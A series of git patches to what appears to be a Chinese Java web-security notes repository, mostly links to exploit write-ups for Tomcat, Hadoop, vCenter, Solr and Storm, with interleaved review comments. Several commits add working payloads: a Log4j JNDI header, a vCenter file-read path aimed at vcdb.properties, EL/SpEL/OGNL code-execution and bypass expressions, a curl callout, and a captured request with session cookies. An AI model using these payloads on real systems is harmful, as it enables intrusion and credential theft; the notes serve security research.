项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。由于有了Sun 的参与和支持,最新的Servlet 和JSP 规范总是能在Tomcat 中得到体现,Tomcat 5支持最新的Servlet 2.4 和JSP 2.0 规范。因为Tomcat 技术先进、性能稳定,而且免费,因而深受Java 爱好者的喜爱并得到了部分软件开发商的认可,成为目前比较流行的Web 应用服务器Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。对于一个初学者来说,可以这样认为,当在一台机器上配置好Apache 服务器,可利用它响应HTML(标准通用标记语言下的一个应用)页面的访问请求。实际上Tomcat是Apache 服务器的扩展,但运行时它是独立运行的,所以当你运行tomcat 时,它实际上作为一个与Apache 独立的进程单独运行的 ![](./img/1.png) + + +[复现tomcat远程代码执行漏洞CVE-2016-8735](https://gv7.me/articles/2018/CVE-2016-8735/) From 65e60bdac9b270aec98bf27d298747e5368350cc Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 20 Oct 2022 23:23:11 +0800 Subject: [PATCH 158/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 26584c0..514c97a 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -184,3 +184,4 @@ + 2022/10/17 [最新CS RCE(CVE-2022-39197)复现心得分享](https://mp.weixin.qq.com/s/89wXyPaSn3TYn4pmVdr-Mw) + 2022/10/17 [RMI攻击Registry的两种方式](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651199558&idx=2&sn=f92be210fda6dcda351912e5819191e5&chksm=bd1d8acd8a6a03db3b62ba72b2a3b931ab99cf74dbacde501c0d615a8eb894c50d96405b3b43&mpshare=1&scene=23&srcid=10175X0cCc5JMI6fbq1VPYi6&sharer_sharetime=1666017207856&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/10/19 [Apache Spark UI 命令注入漏洞 CVE-2022-33891](https://mp.weixin.qq.com/mp/appmsgalbum?__biz=MjM5MTYxNjQxOA==&action=getalbum&album_id=2619537533131227139&scene=173&from_msgid=2652892336&from_itemidx=1&count=3&nolastread=1#wechat_redirect) ++ 2022/10/20 [如何更加精确的检测Tomcat AJP文件包含漏洞(CVE-2020-1938)](https://gv7.me/articles/2020/how-to-detect-tomcat-ajp-lfi-more-accurately/) **ajp的利用** From 5dfacecf58e66efb2be368053025c1f04571aad4 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 22 Oct 2022 00:22:39 +0800 Subject: [PATCH 159/332] Update Readme.md --- "java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" index 0bc0205..7944b15 100644 --- "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" +++ "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" 
@@ -26,3 +26,4 @@ https://www.sec-in.com/author/8 这个师傅太猛了 + 2022/01/31 [验证是否存在写文件漏洞小技巧](https://mp.weixin.qq.com/s?__biz=MzkyMDIxMjE5MA==&mid=2247483994&idx=1&sn=2d29f31afa27a3709b5dc9e46532230a&chksm=c19705ebf6e08cfdd6dc59937beee4a77110b3cac9958335a6cfdbd020d00f2f24a7033063f2&mpshare=1&scene=23&srcid=0131EzMk9fpayyNZeXFR8nhb&sharer_sharetime=1643561054742&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) + 2022/02/26 [记一次曲折的weblogic上传webshell](https://chaserw.github.io/2021/11/05/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%9B%B2%E6%8A%98%E7%9A%84weblogic%E4%B8%8A%E4%BC%A0webshell/) + 2022/10/08 [实战 | 一次成功的子域名劫持](https://mp.weixin.qq.com/s/xA6OVbeQrCgeYBWMtkvWVA) **学习** ++ 2022/10/22 [上传包可“绕过”Java过滤器的检查?](https://gv7.me/articles/2019/why-can-multipart-post-bypass-java-filter/) **遇到了post请求有waf可以试一试文件上传的方法传递参数** From 3f0005fc0f5ab54ba4ea243fef3d9bf10b003b37 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 22 Oct 2022 00:23:46 +0800 Subject: [PATCH 160/332] Update Readme.md --- "java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" index 7944b15..63f06c2 100644 --- "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" +++ "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" 
@@ -27,3 +27,4 @@ https://www.sec-in.com/author/8 这个师傅太猛了 + 2022/02/26 [记一次曲折的weblogic上传webshell](https://chaserw.github.io/2021/11/05/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%9B%B2%E6%8A%98%E7%9A%84weblogic%E4%B8%8A%E4%BC%A0webshell/) + 2022/10/08 [实战 | 一次成功的子域名劫持](https://mp.weixin.qq.com/s/xA6OVbeQrCgeYBWMtkvWVA) **学习** + 2022/10/22 [上传包可“绕过”Java过滤器的检查?](https://gv7.me/articles/2019/why-can-multipart-post-bypass-java-filter/) **遇到了post请求有waf可以试一试文件上传的方法传递参数** ++ 2022/10/22 [burpsuite保存现有数据包记录&导入之前的抓包记录](https://blog.csdn.net/Fly_hps/article/details/88854111) [148处XSS你如何提交给开发修复?](https://gv7.me/articles/2017/how-do-to-submit-148-xss-vulnerabilities/) **bp的保存数据** From 1a286e4e90f9fe6176a7431c5c88fe7f4836b434 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 22 Oct 2022 16:02:35 +0800 Subject: [PATCH 161/332] Add files via upload --- .../chunked-coding-converter.md" | 20 +++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 "java\346\227\245\345\270\270/chunked-coding-converter.md" diff --git "a/java\346\227\245\345\270\270/chunked-coding-converter.md" "b/java\346\227\245\345\270\270/chunked-coding-converter.md" new file mode 100644 index 0000000..4cd529f --- /dev/null +++ "b/java\346\227\245\345\270\270/chunked-coding-converter.md" @@ -0,0 +1,20 @@ +# chunked-coding-converter + +[唯快不破的分块传输绕WAF](https://mp.weixin.qq.com/s/pM1ULCqNdQwSB7hcltrbtw) + +[Bypass WAF HTTP协议覆盖+分块传输组合绕过](https://mp.weixin.qq.com/s/2DDYyvsZ5HIQC0qGMK9znQ) + +[利用分块传输吊打所有WAF](https://mp.weixin.qq.com/s/eDiiiVX4oF0LYG3Ia5P4mw) + +[技术讨论 | 在HTTP协议层面绕过WAF](https://www.freebuf.com/news/193659.html) + +[编写Burp分块传输插件绕WAF](https://gv7.me/articles/2019/chunked-coding-converter/) + +[Java反序列化数据绕WAF之延时分块传输](https://gv7.me/articles/2021/java-deserialized-data-bypasses-waf-through-sleep-chunked/) + +``` +只有HTTP/1.1支持分块传输 +POST包都支持分块,不局限仅仅于反序列化和上传包 +Transfer-Encoding: chunked大小写不敏感 +``` + 
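Review bot: the three notes closing `chunked-coding-converter.md` are prose inside an untagged code fence, and the last one (`Transfer-Encoding: chunked大小写不敏感`) does not say whether the header name, the `chunked` token, or both are matched case-insensitively. Turn them into a bullet list, spell that out, and say which of the six linked articles each note is taken from. The new file is also not linked from `java日常/Readme.md`, which this commit leaves untouched.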
From ecc2b96cb605d519cbccd1e98b501572154224bb Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 24 Oct 2022 11:35:43 +0800 Subject: [PATCH 162/332] Create Readme.md --- hadoop/Readme.md | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 hadoop/Readme.md diff --git a/hadoop/Readme.md b/hadoop/Readme.md new file mode 100644 index 0000000..7e168b6 --- /dev/null +++ b/hadoop/Readme.md @@ -0,0 +1,21 @@ +# Hadoop + +[【安全风险通告】Apache Hadoop Yarn RPC未授权访问漏洞安全风险通告](https://mp.weixin.qq.com/s?__biz=MzU5NDgxODU1MQ==&mid=2247495027&idx=1&sn=5758a6717309a55e09f184e5bae82c75&chksm=fe79c9ebc90e40fd6d0c3f0bd21ce92f53b4f58aa0ee07d0c005ca85a28d2cfd70f61c40fae7&mpshare=1&scene=23&srcid=1123jW67UF5RY5e5aOeDZ5ha&sharer_sharetime=1637638003307&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) + +[Hadoop Yarn RPC RCE 复现](https://mp.weixin.qq.com/s/lVl5HnVuZyLTIeSrbw1cuA) + +[Hadoop Yarn RPC未授权RCE(含一键利用工具)](https://mp.weixin.qq.com/s?__biz=MzkwNDI1NDUwMQ==&mid=2247485150&idx=1&sn=c31937fdb3e92ae3951a98b7967032b2&chksm=c0888394f7ff0a8224a8984f2cb4935f9aa1e7d243c4b512c488600d8fef0b6ec16a2b345865&token=616099468&lang=zh_CN#rd) + +[Hadoop Yarn RPC未授权访问漏洞复现](https://zgao.top/hadoop-yarn-rpc%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/) + +[GHSL-2022-012: Arbitrary file write during TAR extraction in Apache Hadoop - CVE-2022-26612](https://securitylab.github.com/advisories/GHSL-2022-012_Apache_Hadoop/) + +## 环境搭建 + +org.apache.hadoop.yarn.util.resource.ResourceUtils + +``` +docker pull kpli0rn/hadoop-rpc-vuln:3.3.0 +docker run -d --name yarn -p 8042:8042 -p 8032:8032 kpli0rn/hadoop-rpc-vuln:3.3.0 +``` + From 537940ec5569abeb556ed3e1d398602f5f513971 Mon Sep 17 00:00:00 2001 
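Review bot: the `docker run` line under `## 环境搭建` in `hadoop/Readme.md` publishes `8032` and `8042` on every host interface for an image that is vulnerable by design (`kpli0rn/hadoop-rpc-vuln:3.3.0`), so the lab is reachable from whatever network the host sits on. Bind both ports to loopback, for example `-p 127.0.0.1:8032:8032 -p 127.0.0.1:8042:8042`. The bare class name `org.apache.hadoop.yarn.util.resource.ResourceUtils` above the fence also needs a sentence saying why it is listed.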
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 24 Oct 2022 15:36:02 +0800 Subject: [PATCH 163/332] Create Readme.md --- VMware vCenter/Readme.md | 92 ++++++++++++++++++++++++++++++++++++++++ 1 file changed, 92 insertions(+) create mode 100644 VMware vCenter/Readme.md diff --git a/VMware vCenter/Readme.md b/VMware vCenter/Readme.md new file mode 100644 index 0000000..f8ff54d --- /dev/null +++ b/VMware vCenter/Readme.md 
@@ -0,0 +1,92 @@ +# vcenter + +### 版本查看 + +``` +/sdk/vimServiceVersions.xml +``` + +### CVE-2021-21972 + +[VMware vCenter RCE 漏洞踩坑实录——一个简单的RCE漏洞到底能挖出什么知识](https://mp.weixin.qq.com/s/eamNsLY0uKHXtUw_fiUYxQ) + +[CVE-2021-21972 vCenter Server 文件写入漏洞分析](https://blog.noah.360.net/vcenter-6-5-7-0-rce-lou-dong-fen-xi/) + +``` +VMware vCenter Server 7.0系列 < 7.0.U1c +VMware vCenter Server 6.7系列 < 6.7.U3l +VMware vCenter Server 6.5系列 < 6.5 U3n +VMware ESXi 7.0系列 < ESXi70U1c-17325551 +VMware ESXi 6.7系列 < ESXi670-202102401-SG +VMware ESXi 6.5系列 < ESXi650-202102101-SG +``` + +endpoint + +``` +/ui/vropspluginui/rest/services/uploadova +``` + +### CVE-2021-21985 + +[CVE-2021-21985 VMware vCenter Server远程代码执行漏洞分析](https://www.ghtwf01.cn/2022/07/31/CVE-2021-21985%20VMware%20vCenter%20Server%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/) + +``` +VMware vCenter Server 7.0系列 < 7.0.U2b +VMware vCenter Server 6.7系列 < 6.7.U3n +VMware vCenter Server 6.5系列 < 6.5 U3p +VMware Cloud Foundation 4.x 系列 < 4.2.1 +VMware Cloud Foundation 4.x 系列 < 3.10.2.1 +``` + +### CVE-2021-22005 + +[vCenter RCE 详细分析过程 (CVE-2021–22005)](https://cloud.tencent.com/developer/article/1887641) + +``` +VMware vCenter Server 7.0 +VMware vCenter Server 6.7 Running On Virtual Appliance +VMware Cloud Foundation (vCenter Server) 4.x +VMware Cloud Foundation (vCenter Server) 3.x +``` + +### Log4j + +endpoint + +``` +/websso/SAML2/SSO/vsphere.local?SAMLRequest= + +X-Forwarded-For: ${jndi:ldap://exp} +``` + + + +### CVE-2022-31680 + +[CVE-2022-31680](https://talosintelligence.com/vulnerability_reports/TALOS-2022-1587) + +``` +GET /psc/data/constraint/amJzMXszAAAAATMAAAACAAAIRW1wbG95ZWUAASL6C7Hsp5eXAAKXEjO-44rgaCk1FZKH_mF7AQQAAAADAAAGTWFyY2luAAB6aQ HTTP/1.1 +Host: 192.168.0.109 +Cookie: JSESSIONID=D8E403940B6B595FF53158ED63671A69; XSRF-TOKEN=b28efbac-6d3c-4fcb-b177-baee9c1e005e; VSPHERE-USERNAME=Administrator%40VSPHERE.LOCAL; 
VSPHERE-CLIENT-SESSION-INDEX=_87577cc1f7ac5bba20fe8d947d9ffcfe +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0 +Accept: application/json, text/plain, */* +Accept-Language: pl,en-US;q=0.7,en;q=0.3 +Accept-Encoding: gzip, deflate +Pragma: no-cache +Isangularrequest: true +X-Xsrf-Token: b28efbac-6d3c-4fcb-b177-baee9c1e005e +Referer: https://192.168.0.109/psc/ +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin +Te: trailers +Connection: close +``` + +### 后续利用 + +[VMware vCenter漏洞实战利用总结](https://mp.weixin.qq.com/s/0gg5TDEtL3lCb9pOnm42gg) + +[Vcenter实战利用方式总结](https://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==&mid=2247499057&idx=1&sn=24ce83c75152529f2b8ef8543162a734&chksm=cfa55922f8d2d0349b97211fdf45df6c78b26ace580b68579817ed67760aaface17348529cf3&mpshare=1&scene=23&srcid=10245pAGxEFHmXFGCMoKjGdB&sharer_sharetime=1666572610152&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From 38258217a9f8a82cb920cd2651f1555c15e71add Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 24 Oct 2022 17:03:42 +0800 Subject: [PATCH 164/332] Update Readme.md --- VMware vCenter/Readme.md | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/VMware vCenter/Readme.md b/VMware vCenter/Readme.md index f8ff54d..a4ff167 100644 --- a/VMware vCenter/Readme.md +++ b/VMware vCenter/Readme.md @@ -6,6 +6,15 @@ /sdk/vimServiceVersions.xml ``` +### VMware vCenter Server 任意文件读取漏洞 + +[VMware vCenter Server 任意文件读取漏洞](https://forum.90sec.com/t/topic/1582) + +endpoint +``` +/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties +``` + ### CVE-2021-21972 [VMware vCenter RCE 漏洞踩坑实录——一个简单的RCE漏洞到底能挖出什么知识](https://mp.weixin.qq.com/s/eamNsLY0uKHXtUw_fiUYxQ) From 5ea6357b701e922c155ffb8ade88fcfe2e395876 Mon Sep 17 00:00:00 2001 
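Review bot: in `VMware vCenter/Readme.md` (PATCH 163/332), the CVE-2021-21985 version list has two rows both labelled `VMware Cloud Foundation 4.x 系列`, with bounds `< 4.2.1` and `< 3.10.2.1`; the second bound is a 3.x version, so its label looks like a copy of the row above and should be checked against the vendor advisory before the list is used for patch triage. The CVE-2022-31680 block also pastes a full captured request, including `JSESSIONID`, `XSRF-TOKEN` and `VSPHERE-CLIENT-SESSION-INDEX` values; the request line plus the link to the Talos report would carry the same information.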
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 25 Oct 2022 09:35:12 +0800 Subject: [PATCH 165/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 514c97a..1549567 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -185,3 +185,4 @@ + 2022/10/17 [RMI攻击Registry的两种方式](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651199558&idx=2&sn=f92be210fda6dcda351912e5819191e5&chksm=bd1d8acd8a6a03db3b62ba72b2a3b931ab99cf74dbacde501c0d615a8eb894c50d96405b3b43&mpshare=1&scene=23&srcid=10175X0cCc5JMI6fbq1VPYi6&sharer_sharetime=1666017207856&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/10/19 [Apache Spark UI 命令注入漏洞 CVE-2022-33891](https://mp.weixin.qq.com/mp/appmsgalbum?__biz=MjM5MTYxNjQxOA==&action=getalbum&album_id=2619537533131227139&scene=173&from_msgid=2652892336&from_itemidx=1&count=3&nolastread=1#wechat_redirect) + 2022/10/20 [如何更加精确的检测Tomcat AJP文件包含漏洞(CVE-2020-1938)](https://gv7.me/articles/2020/how-to-detect-tomcat-ajp-lfi-more-accurately/) **ajp的利用** ++ 2022/10/25 [Python PIP自解压的命令执行](https://mp.weixin.qq.com/s/xFY6VYzrA4RryH1agC8zUw) **包管理工具的命令执行** [node npm 中的preinstall 命令执行](https://bytedance.feishu.cn/docx/doxcnWmtkIItrGokckfo1puBtCh) From d39959ef08ef3f46dda521dad048bf4e5909dc5a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 25 Oct 2022 20:46:21 +0800 Subject: [PATCH 166/332] Update README.md --- Solr/README.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/Solr/README.md b/Solr/README.md index 38c86b8..cc7d06c 100644 --- a/Solr/README.md +++ b/Solr/README.md @@ -186,3 +186,6 @@ get = requests.get(burp0_url, headers=burp0_headers) print(get.text) ``` +## 任意文件删除 + +https://mp.weixin.qq.com/s/JXBiQR3q7ykITVFBwm_9Vg 
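Review bot: in `Solr/README.md`, the new `## 任意文件删除` section is a bare URL with no title, advisory id or affected versions, so a reader cannot tell which Solr releases need attention without opening the WeChat link, and the entry loses its meaning if that link dies. Suggest the `[title](url)` form used in the other Readme files plus one line naming the affected versions and the fixed release. The heading is also added directly after the closing code fence, with no blank line between them.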
From 8b8e829bf050464a8b36ddf26841bed72dbb84aa Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 26 Oct 2022 11:39:18 +0800 Subject: [PATCH 167/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 1549567..ff2b853 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -186,3 +186,4 @@ + 2022/10/19 [Apache Spark UI 命令注入漏洞 CVE-2022-33891](https://mp.weixin.qq.com/mp/appmsgalbum?__biz=MjM5MTYxNjQxOA==&action=getalbum&album_id=2619537533131227139&scene=173&from_msgid=2652892336&from_itemidx=1&count=3&nolastread=1#wechat_redirect) + 2022/10/20 [如何更加精确的检测Tomcat AJP文件包含漏洞(CVE-2020-1938)](https://gv7.me/articles/2020/how-to-detect-tomcat-ajp-lfi-more-accurately/) **ajp的利用** + 2022/10/25 [Python PIP自解压的命令执行](https://mp.weixin.qq.com/s/xFY6VYzrA4RryH1agC8zUw) **包管理工具的命令执行** [node npm 中的preinstall 命令执行](https://bytedance.feishu.cn/docx/doxcnWmtkIItrGokckfo1puBtCh) ++ 2022/10/26 [这是我见过最复杂的URL了](https://cn-sec.com/archives/1372213.html) From 730d0c4ceadeb1cc92845254303c16c3dba8c317 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 26 Oct 2022 21:44:06 +0800 Subject: [PATCH 168/332] Create Readme.md --- apache storm/Readme.md | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 apache storm/Readme.md diff --git a/apache storm/Readme.md b/apache storm/Readme.md new file mode 100644 index 0000000..c269064 --- /dev/null +++ b/apache storm/Readme.md 
@@ -0,0 +1,21 @@ +# apache storm + +## 环境搭建 + +https://blog.51cto.com/u_13870740/3445168 + +https://github.com/heibaiying/BigData-Notes/blob/master/notes/installation/Storm%E5%8D%95%E6%9C%BA%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA.md + +``` +nohup bash storm dev-zookeeper & bash storm nimbus & bash storm supervisor &bash storm ui & bash storm logviewer & +``` + +## 漏洞分析 + +https://paper.seebug.org/1780/#0x03 + +https://blog.noah.360.net/apache-storm-vulnerability-analysis/ + +https://y4er.com/posts/apache-storm-two-cve/ + +**自己尝试反序列化并没有成功cb,环境是2.1.0** From 5bad93020461157ec8398cbcac82898febf3378d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 27 Oct 2022 14:19:26 +0800 Subject: [PATCH 169/332] Update Readme.md --- shell/EL/Readme.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/shell/EL/Readme.md b/shell/EL/Readme.md index 56f6390..66df221 100644 --- a/shell/EL/Readme.md +++ b/shell/EL/Readme.md @@ -39,3 +39,9 @@ ${''.class.forName('com.sun.org.apache.bcel.internal.util.ClassLoader').newInsta ``` **需要注意jdk版本问题可能没有bcel类** 理论上spel表达式可以用的payLoad 这里也可以利用 +## bypass + +https://forum.butian.net/share/1880 +```java +${""[param.a]()[param.b](param.c)[param.d]()[param.e](param.f)[param.g](param.h)} +``` From 9c0a916079cd1fcde6fd6b7ebfa50ff2ecd4d209 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 27 Oct 2022 20:42:56 +0800 Subject: [PATCH 170/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index ff2b853..706832e 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -187,3 +187,4 @@ + 2022/10/20 [如何更加精确的检测Tomcat AJP文件包含漏洞(CVE-2020-1938)](https://gv7.me/articles/2020/how-to-detect-tomcat-ajp-lfi-more-accurately/) **ajp的利用** + 2022/10/25 [Python PIP自解压的命令执行](https://mp.weixin.qq.com/s/xFY6VYzrA4RryH1agC8zUw) **包管理工具的命令执行** [node npm 中的preinstall 命令执行](https://bytedance.feishu.cn/docx/doxcnWmtkIItrGokckfo1puBtCh) + 2022/10/26 [这是我见过最复杂的URL了](https://cn-sec.com/archives/1372213.html) ++ 2022/10/27 [【技术干货】CVE-2022-34916 Apache Flume 远程代码执行漏洞分析](https://mp.weixin.qq.com/s/zS2TBfBsK1gzkLxs5u3GmQ) From df7e01ec98e9fc65c8a1461a39acc71188918cac Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 29 Oct 2022 01:33:25 +0800 Subject: [PATCH 171/332] Create Readme.md --- wso2/Readme.md | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 wso2/Readme.md diff --git a/wso2/Readme.md b/wso2/Readme.md new file mode 100644 index 0000000..1e02983 --- /dev/null +++ b/wso2/Readme.md @@ -0,0 +1,25 @@ +# wso2 + +## CVE-2022-29464 + +### 文件上传 + +路径匹配处理类 + +![image](https://user-images.githubusercontent.com/63966847/198697817-2f3055f2-5918-4336-bf73-71e500a1050b.png) + +![image](https://user-images.githubusercontent.com/63966847/198697831-7aeb695f-b02d-4a77-a403-562a37b4245f.png) + +### fix + +1.加了权限认证 + +2.对上传文件的路径做校验 + +### 参考 + +https://github.com/wso2/carbon-kernel/pull/3152/commits/13795df0a5b6a2206fd0338abfff057a7b99e1bb + +https://docs.wso2.com/m/mobile.action#page/180952746 + +https://www.anquanke.com/post/id/273528?from=timeline From eb4ece311d40e5e7ee61cdeec8a51fba4d0aca5d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 29 Oct 2022 11:14:30 +0800 Subject: [PATCH 172/332] Update Readme.md --- shell/SPEL/Readme.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/shell/SPEL/Readme.md b/shell/SPEL/Readme.md index b0acffd..9487637 100644 --- a/shell/SPEL/Readme.md +++ b/shell/SPEL/Readme.md 
@@ -110,6 +110,11 @@ print(')}') 其他bypass: https://xz.aliyun.com/t/9245 +## springboot回显 +``` +Java.type("org.springframework.web.context.request.RequestContextHolder").currentRequestAttributes().getResponse().addHeader("test",new java.lang.String(Java.type("sun.misc.IOUtils").readFully(new java.io.FileInputStream("/flag"),1024,false))); +``` + ## 参考 > https://xz.aliyun.com/t/9245 **可以使用#request.getRequestedSessionId() 或者 #request.getHeader('User-Agent') 反正可以使用request对象或者respose** > From 914df006509b353eae398034ef49839d3df8a4f0 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 29 Oct 2022 11:34:43 +0800 Subject: [PATCH 173/332] Update Readme.md --- shell/OGNL/Readme.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/shell/OGNL/Readme.md b/shell/OGNL/Readme.md index 1c52c1b..b09dfcf 100644 --- a/shell/OGNL/Readme.md +++ b/shell/OGNL/Readme.md @@ -1,5 +1,7 @@ # OGNL bypass ```java +${@jdk.jshell.JShell@create().eval('java.lang.Runtime.getRuntime().exec("")} + new javax.script.ScriptEngineManager().getEngineByName("js").eval(此处的Payload可以进行unicode编码) new javax.script.ScriptEngineManager().getEngineByName("js").eval("new j\u0061va.lang.ProcessBuilder['(java.l\u0061ng.String[])'](['cmd.exe','/c','calc']).start()\u003B"); From bca87f5ed1a77de4ffb0b4474be893d412485607 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 29 Oct 2022 11:36:21 +0800 Subject: [PATCH 174/332] Update Readme.md --- shell/SPEL/Readme.md | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/shell/SPEL/Readme.md b/shell/SPEL/Readme.md index 9487637..82b8808 100644 --- a/shell/SPEL/Readme.md +++ b/shell/SPEL/Readme.md 
@@ -83,7 +83,10 @@ T(java.nio.file.Files).write(T(java.nio.file.Paths).get(T(java.net.URI).create(" Nuxeo RCE ''['class'].forName('java.lang.Runtime').getDeclaredMethods()[15].invoke(''['class'].forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),'curl 172.17.0.1:9898') - + +jdk9+ + +T(jdk.jshell.JShell).Methods[6].invoke(null,'').eval('xxxx'); ``` 字符串绕过 From 8ec5138ab18ade5003102b0fadc937aaf8ad021a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 30 Oct 2022 21:57:11 +0800 Subject: [PATCH 175/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 706832e..b25c00c 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -188,3 +188,4 @@ + 2022/10/25 [Python PIP自解压的命令执行](https://mp.weixin.qq.com/s/xFY6VYzrA4RryH1agC8zUw) **包管理工具的命令执行** [node npm 中的preinstall 命令执行](https://bytedance.feishu.cn/docx/doxcnWmtkIItrGokckfo1puBtCh) + 2022/10/26 [这是我见过最复杂的URL了](https://cn-sec.com/archives/1372213.html) + 2022/10/27 [【技术干货】CVE-2022-34916 Apache Flume 远程代码执行漏洞分析](https://mp.weixin.qq.com/s/zS2TBfBsK1gzkLxs5u3GmQ) ++ 2022/10/30 [Beware the Nashorn: ClassFilter gotchas](https://mbechler.github.io/2019/03/02/Beware-the-Nashorn/) From ef725d97fcc82ec08ec65de66b2eb8460ca49c47 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 1 Nov 2022 20:46:54 +0800 Subject: [PATCH 176/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b25c00c..7ce9d99 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
